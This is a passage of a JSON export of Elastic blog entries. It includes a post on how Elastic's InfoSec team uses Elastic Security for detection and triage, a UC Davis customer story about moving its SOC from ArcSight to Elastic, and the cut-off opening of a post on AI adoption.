Elastic","updated_at":"2024-04-29T12:38:25.708Z","updated_by":"blt09fe13c35e06a262","url":"/blog/overcoming-data-challenges-for-state-and-local-government-and-education-with-elastic","use_case":[],"versions":[],"weekly_category":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-04-29T12:38:35.533Z","user":"blt09fe13c35e06a262"}},{"_version":9,"locale":"en-us","uid":"blteca0f4567c03e730","ACL":{},"abstract_l10n":"Elastic uses and tests our own products. That’s how our InfoSec team’s enterprise security data is helping our product team build and deliver quality, real-world detections.","author":["bltd9a9055532c88fc5"],"body_l10n":"\u003cp\u003eAt Elastic, we internally use, test, and provide feedback on all of our products. For example, the Information Security team is helping the Product team build a stronger solution for our customers.\n\u003c/p\u003e\u003cp\u003eThe InfoSec team is an extremely valuable resource who acts not only as an extension of Quality Assurance/Testing, but also as a data custodian. In fact, our internal detections team utilizes internal Elastic InfoSec data to help build and test \u003ca href=\"https://www.elastic.co/guide/en/security/7.13/prebuilt-rules.html\"\u003edetection rules\u003c/a\u003e that ultimately find their way into the Elastic Security product.\u003cbr\u003e\n\u003c/p\u003e\u003cp\u003eLast month, I was afforded the wonderful opportunity of “riding along” with our InfoSec team to better understand how we use Elastic internally. Over the course of three days, spread across three weeks, I saw the underbelly of our internal systems, how they are used, and how the team uses Elastic Security every day.\n\u003c/p\u003e\u003cp\u003e\u003cem\u003e[At the time of this ride-along, version \u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-7-12-0-schema-on-read-frozen-tier-autoscaling\"\u003e7.12\u003c/a\u003e of the Elastic Stack had been released and running in the wild for well over a month. However, the InfoSec team usually runs several minor iterations ahead of general availability.]\u003c/em\u003e\n\u003c/p\u003e \u003cstrong\u003e\u003ch2\u003eDay one: Lay of the land\u003c/h2\u003e\u003c/strong\u003e\u003cp\u003eOn day one, I learned about all the tools InfoSec uses to keep Elasticians safe.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eThese include, but are not limited to, Case Management (Hive), Identity Management (Okta), various Threat Intelligence feeds, Slack, and Elastic Endgame. Internal Elastic data sources that are being pulled into Elasticsearch range from cloud-specific logs (AWS Cloudtrail, Azure Activity/Diagnostic Logs, GCP Stackdriver) to network-specific logs (load balancer, proxy, web server, Github, VPC Flow, authentication, and vulnerability) to more host-specific (Auditbeat/Filebeat, Endpoint Protection and Telemetry).\n\u003c/p\u003e\u003cp\u003eWith all this data stored and available for searching, one key area of functionality the InfoSec team requires that is used every day is \u003ca href=\"/guide/en/cloud/current/ec-enable-ccs.html\"\u003ecross-cluster search\u003c/a\u003e. With this setup, a single cluster serves as the search head, which can query and alert on events across all additional clusters. All out-of-the-box detection rules (currently numbering 525+) are enabled and running against the corresponding data sources. As a best practice, InfoSec focuses on cloud detections first (AWS, Azure, GCP). Based on industry trends, they have a specific emphasis around living-off-the-land (LOLbins) detections as well.\n\u003c/p\u003e\u003cp\u003eIn addition to the standard machine learning jobs, InfoSec leverages 15+ custom\u0026nbsp;jobs that pinpoint rare environmental occurrences. These machine learning job types include:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli aria-level=\"1\"\u003eProcess/Executable (Process by System/Provider/Team)\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eProcess arguments by Process\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eProcess by Execution Location\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eLogin Location (Geo and IP)\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eCurrently, detection alerts are forwarded into a generalized Slack channel and might look like the following:\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0cef0a6e8961cbfd/60d3a7e31e0505677a8837a6/blog-elastic-security-infosec-1.png\" data-sys-asset-uid=\"blt0cef0a6e8961cbfd\" alt=\"blog-elastic-security-infosec-1.png\"\u003e\n\u003c/p\u003e\u003cp\u003eIn general, this alert may consist of:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli aria-level=\"1\"\u003e \n\tA high-level description of the event\n\t\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003e \n\tHyperlink to Kibana alert\n\t\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003e\n\t3-4 information fields (offending source, acting process, etc.)\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eWhile internally at Elastic we leverage Slack for notifications, there are several alternative detection rule notification paths available for customers:\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfdc0c4f89f7e1614/60d3a7f3b930a53616fa512b/blog-elastic-security-infosec-2.png\" data-sys-asset-uid=\"bltfdc0c4f89f7e1614\" alt=\"blog-elastic-security-infosec-2.png\"\u003e\n\u003c/p\u003e\u003cp\u003eAn analyst will pick up the alert, then pivot into Kibana and the Case Management tool to start their triage process. For this triage work, an analyst often walks through a process of elimination in determining what is the alert/event and what needs to be done with it. Analysts pick indicators of compromise (IoCs) to cross-reference and correlate across data sources such as VirusTotal, URLscan.io, and \u003ca href=\"/guide/en/beats/filebeat/current/filebeat-module-threatintel.html\" \"=\"\"\u003eadditional threat intel feeds\u003c/a\u003e. The analyst may leverage an IoC match for context and enrichment, and not necessarily strictly for alerting purposes. This helps to provide more value for the analyst to make a quicker decision on further investigative work or escalation toward proper resolution.\n\u003c/p\u003e\u003ch2\u003eDays two and three: Using Elastic to protect Elastic\u003c/h2\u003e\u003cp\u003eOn days two and three, I learned about our security-specific workflows and decision-tree processes when InfoSec is engaged in responding to an alert.\n\u003c/p\u003e\u003cp\u003eThe Elastic InfoSec team has a weekly standing call with our Product Management team. Considering that we are \u003ca href=\"/blog/securing-our-own-endpoints-with-elastic-security\"\u003ecustomer zero\u003c/a\u003e of all software build candidates, it is imperative to give proper, quick, and valuable feedback on what works and what can be improved upon. There have been several instances where our own InfoSec team helped design the vision for certain Elastic Security functionality.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eOne of these \u003ca href=\"https://github.com/elastic/kibana/issues/66587\"\u003esuggestions\u003c/a\u003e was the ability to include any data from a detection engine alert in the related action so that InfoSec could surface as much alert context as was available to the analysts. Prior to this, it was only possible to include some fields related to the detection rule itself — but not all the fields related to the detection.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eThe relationship between InfoSec and Product Management is truly symbiotic. The InfoSec team provides extremely valuable insight and feedback for our Product Management team, and the Product Management team affords InfoSec the opportunity to run a minor version ahead of the rest of the company and customers. This “first view” access means both teams get to digest new features and functions, as well as act as another layer of quality assurance.\n\u003c/p\u003e\u003cp\u003eAnalysts often do things that may be unexpected during the development of a product. One \u003ca href=\"https://github.com/elastic/kibana/pull/98706\"\u003eexample\u003c/a\u003e of this was in Timeline when using many “OR” conditions — resulting in not being able to see search results due to the query area taking up the entire screen. This was a frustrating usability issue that could arise when stitching together parent-child relationships. Thankfully it was an easy and quick fix for our developers.\n\u003c/p\u003e\u003cp\u003eAs a part of the triage process, it may be determined that a file needs to be pulled from the offending host. In order to determine “what happened” or “what could have happened,” an analyst may need to evaluate if a file is deemed “safe” or “unsafe.” Internally, we have an \u003ca href=\"/blog/how-to-build-a-malware-analysis-sandbox-with-elastic-security\"\u003eElastic-built malware sandbox\u003c/a\u003e that provides an opportunity to safely execute a file while collecting valuable telemetry data around the file. This, in turn, can help provide a quick turnaround to our end users on the safety of a potential attachment or file. Our Elastic Endpoint agent acts as a valuable part of this all-inclusive VM. This agent has been a part of the most recent (third) round of MITRE testing and has shown to perform effectively for both our clients as well as our own internal needs. \u003ca href=\"/blog/mitre-engenuity-attck-round-3-carbanak-fin7-vs-free-open-elastic-security\"\u003eWe posted these results on our blog\u003c/a\u003e, and also provided a \u003ca href=\"https://ela.st/mitre-round3\"\u003eKibana Dashboard\u003c/a\u003e for the public to navigate the results for their own reference.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eOur InfoSec team also coordinates and helps manage the Elastic Bug Bounty Program. Info on disclosure of security issues can be found at \u003ca href=\"/community/security/\"\u003eelastic.co/community/security/\u003c/a\u003e as well as the \u003ca href=\"https://discuss.elastic.co/c/announcements/security-announcements/31\"\u003eSecurity Announcements forum\u003c/a\u003e. The bug bounty program is currently being reworked and expanded to be relaunched approximately within the next month.\n\u003c/p\u003e \u003cstrong\u003e\u003ch2\u003e\u003c/h2\u003e\u003c/strong\u003e","category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2021-06-23T21:27:30.742Z","created_by":"bltda02bad9f9f792f1","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"bltda20de027f0d8dea","created_by":"bltc87e8bcd2aefc255","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-02-14T21:07:07.850Z","updated_at":"2021-01-12T21:06:03.842Z","content_type":"image/png","file_size":"44742","filename":"blog-banner-elastic-on-elastic.png","title":"blog-banner-elastic-on-elastic.png","ACL":{},"_version":2,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-12T21:06:06.915Z","user":"bltf6ab93733e4e3a73"},"description":"","parent_uid":null,"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltda20de027f0d8dea/5ffe0f3bc4800352b1e50143/blog-banner-elastic-on-elastic.png"},"industry":[],"level":["introduction"],"markdown_l10n":"","newsfeed":[],"popular_topics":[],"product":["security","elasticsearch","elastic stack","kibana","apm","siem","logs"],"publish_date":"2021-06-30T18:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"How the Elastic InfoSec team uses Elastic Security","seo_description_l10n":"","noindex":false,"canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""}},"services_events":[],"tags":[],"tags_blog_type":["blt9ac2c859f49c83e0"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt38a6c014d6bd5ecb","ACL":{},"created_at":"2021-06-02T15:27:49.854Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack","label_l10n":"Stack","tags":[],"title":"Stack","updated_at":"2021-07-13T22:00:22.378Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.258Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"bltb249a1eeba77b317","ACL":{},"created_at":"2020-06-17T03:31:53.522Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"apm","label_l10n":"APM","tags":[],"title":"APM","updated_at":"2020-07-06T22:20:22.552Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.550Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt2e5ece40473e6b0a","ACL":{},"created_at":"2020-06-17T03:32:06.756Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"log-analytics","label_l10n":"Log analytics","tags":[],"title":"Log analytics","updated_at":"2020-07-06T22:20:10.220Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.397Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt60e4f8c6c19cebb7","ACL":{},"created_at":"2020-06-17T03:32:19.868Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"metrics","label_l10n":"Metrics","tags":[],"title":"Metrics","updated_at":"2020-07-06T22:20:08.577Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.406Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"bltd44d2f0e1f4f4b7d","ACL":{},"content_type":"image/png","created_at":"2020-02-14T21:07:01.894Z","created_by":"bltc87e8bcd2aefc255","description":"","file_size":"37777","filename":"blog-thumb-elastic-on-elastic.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-elastic-on-elastic.png","updated_at":"2022-02-11T21:03:58.816Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:15.343Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd44d2f0e1f4f4b7d/5ffe0f637c627d662d7fd996/blog-thumb-elastic-on-elastic.png"},"title":"How the Elastic InfoSec team uses Elastic Security","title_l10n":"How the Elastic InfoSec team uses Elastic Security","updated_at":"2024-04-29T12:35:30.231Z","updated_by":"blt09fe13c35e06a262","url":"/blog/how-the-elastic-infosec-team-uses-elastic-security","use_case":["security analytics"],"versions":["7.12"],"weekly_category":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:33.137Z","user":"blt36e890d06c5ec32c"}},{"_version":4,"locale":"en-us","uid":"bltbde9d50e9a47f000","ACL":{},"abstract_l10n":"When UC Davis needed to enhance its SOC, they turned to Elastic to replace their legacy SIEM tool. Now, the SOC is able to address the visibility problems they experienced with their legacy tool while maximizing cost benefits.","author":["bltbdcb99c483168722"],"body_l10n":"\u003cp\u003eThe University of California at Davis is an agriculturally focused university of more than 30,000 students. Founded in 1905, the university performs federally funded research for the U.S. Department of Defense, U.S. Department of Agriculture, and other agencies. It’s also home to\u0026nbsp; an electric power substation, police and fire departments, and even an airport.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eAll of this combined is a digital security challenge for Jeff Rowe, the university’s cybersecurity architect. There are 5,000 servers, and the university's Security Operations Center monitors 170,000 user accounts for cybersecurity threats originating across the globe.\n\u003c/p\u003e\u003cp\u003eWith this level of complexity, UC Davis needed to enhance its security even more. The first step for the university was to centralize security logs in one place by eliminating multiple data silos that were difficult to maintain and search.\n\u003c/p\u003e\u003cp\u003e“Everything was spread out across multiple systems … Some of the systems were hard to maintain,” Rowe says. “This is primarily what we wanted to address with a new project.”\n\u003c/p\u003e\u003cp\u003eAccording to Rowe, the university wanted Elastic to replace their legacy security SIEM tool, ArcSight, which was handling about 300 gigs a day of security logs for their Security Operations Center (SOC).\n\u003c/p\u003e\u003ch2\u003eThe UC Davis journey to Elastic\u003c/h2\u003e\u003cp\u003eArcSight was labor intensive and expensive, Rowe says. In addition, there was no federated access control, which meant that ArcSight couldn't be made available to some UC Davis partners.\n\u003c/p\u003e\u003cp\u003eBecause of these shortcomings, the time had come to move to a “next gen security logging platform.” They evaluated Elastic, Splunk, SumoLogic, and LogRhythm. UC Davis chose Elastic because it solved their data visibility issues, was easier to maintain, and was cost effective.\n\u003c/p\u003e\u003cp\u003eThe migration to Elasticsearch was completed in about six months — about a half a year sooner than planned. The university is now ingesting, on average, 800GB of data a day into Elasticsearch. The SOC retains logs at various hot, warm, and cold phases to maximize cost benefits.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003e“We can get a lot of data and it helps address our visibility problem that we've always struggled with before,” Rowe says.\n\u003c/p\u003e\u003ch2\u003eElastic reduces costs, enhances security\u003c/h2\u003e\u003cp\u003eAccording to Rowe, Elastic supplies a wealth of benefits to the university:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli aria-level=\"1\"\u003eProvides a high-performance, fault-tolerant logging platform\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eReduces costs\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eEnables federated, role-based access control\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eEnhances security\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eEmpowers student analysts working with the SOC to get well-placed jobs after graduation\u003c/li\u003e\n\u003c/ul\u003eWatch the \u003ca href=\"/elasticon/archive/2020/global/protecting-against-cyber-attacks-at-uc-davis-with-elastic\"\u003efull presentation\u003c/a\u003e to learn more about how Elastic enhanced security at UC Davis, and to find out how the university plans to use security and machine learning to become an even greater institution of education and research.","category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2021-06-17T17:42:02.324Z","created_by":"bltda02bad9f9f792f1","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"blt5dca9f94c4f2358b","created_by":"bltf6ab93733e4e3a73","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-09-22T18:53:30.246Z","updated_at":"2020-09-22T18:53:30.246Z","content_type":"image/png","file_size":"37022","filename":"blog-banner-elasticon-global-announcement.png","title":"blog-banner-elasticon-global-announcement.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-09-23T13:30:46.594Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5dca9f94c4f2358b/5f6a482af0d2b04fae76c9c7/blog-banner-elasticon-global-announcement.png"},"industry":["education"],"level":[],"markdown_l10n":"","newsfeed":[],"popular_topics":[],"product":["siem","logs"],"publish_date":"2021-06-21T15:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"Why UC Davis chose Elastic to enhance its Security Operations Center","seo_description_l10n":"","noindex":false,"canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""}},"services_events":[],"tags":[],"tags_blog_type":["blt9ac2c859f49c83e0"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[{"_version":6,"locale":"en-us","uid":"blt250fefd1c4d36a4c","ACL":{},"created_at":"2020-06-17T03:22:54.278Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"education-nonprofit","label_l10n":"Education \u0026 non profit","tags":[],"title":"Education \u0026 non-profit","updated_at":"2020-08-13T16:41:17.070Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.286Z","user":"blt4b2e1169881270a8"}}],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt2e5ece40473e6b0a","ACL":{},"created_at":"2020-06-17T03:32:06.756Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"log-analytics","label_l10n":"Log analytics","tags":[],"title":"Log analytics","updated_at":"2020-07-06T22:20:10.220Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.397Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":3,"is_dir":false,"uid":"bltde8138e4e5d6649a","ACL":{},"content_type":"image/png","created_at":"2020-09-22T18:53:22.400Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"59971","filename":"blog-thumb-elasticon-global-announcement.png","parent_uid":null,"tags":[],"title":"blog-thumb-elasticon-global-announcement.png","updated_at":"2020-09-22T19:03:12.142Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-09-22T19:03:15.457Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltde8138e4e5d6649a/5f6a4a705e85ad4dee190dc9/blog-thumb-elasticon-global-announcement.png"},"title":"Why UC Davis chose Elastic to enhance its Security Operations Center","title_l10n":"Why UC Davis chose Elastic to enhance its Security Operations Center","updated_at":"2024-04-29T12:33:52.292Z","updated_by":"blt09fe13c35e06a262","url":"/blog/why-uc-davis-chose-elastic-to-enhance-its-security-operations-center","use_case":["security analytics","log analytics"],"versions":[],"weekly_category":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-04-29T12:33:59.180Z","user":"blt09fe13c35e06a262"}}],1822],"blogV2entries":[[{"uid":"blt53f201d9c121c319","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"AI adoption is top of mind for 92% of IT leaders. Three IT CxOs share what they’ve learned on their AI adoption journeys, how they tackled challenges, and how they’re leading their organizations in this new era.","author":["blt2914a3798eec2d59"],"category":["bltc17514bfdbc519df"],"created_at":"2025-02-18T18:17:52.654Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf0c9303380b95265"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003eAn impressive 92% of organizations plan to invest or have already \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\" target=\"_self\"\u003e\u003cspan style='font-size: 12pt;'\u003einvested in artificial intelligence (AI)\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e. With so many organizations on their AI adoption journeys at varying levels of AI maturity, we can learn from those who led the charge on these initiatives. From identifying use cases and integrating AI into your architecture to getting your employees on board and measuring your success, the IT leaders at these organizations have been through it all — and they have a lot of wisdom to share.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What is AI adoption?","_metadata":{"uid":"cs61e6ea1a5252dd95"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003eFirst, some background. Researchers from the National Bureau of Economic Research define AI adoption\u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e\u003csup\u003e1\u003c/sup\u003e\u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e as using AI for production — that is, using AI to get work done within the organization. This would include \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/generative-ai-customer-support-elastic-support-assistant\"\u003e\u003cspan style='font-size: 12pt;'\u003esupport engineers\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e using an AI-powered tool to find the information they need to help customers with their requests, or a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/jaguar-land-rover\"\u003e\u003cspan style='font-size: 12pt;'\u003ecar manufacturer\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e using AI-powered predictive analytics to analyze sensor data from machines to predict failures and maintenance requirements.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The progression of AI adoption: Key statistics and trends","_metadata":{"uid":"cs4838c0fc15bb6004"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the past year, we saw a surge in AI adoption across the globe. A 2024 survey found that 72% of organizations\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003csup\u003e2\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e integrate AI into at least one business function — this is a huge leap from the 55% in 2023. Still, large companies are taking the lead on AI adoption. Half of organizations with more than 5,000 employees\u003c/span\u003e\u003cspan style='font-size: 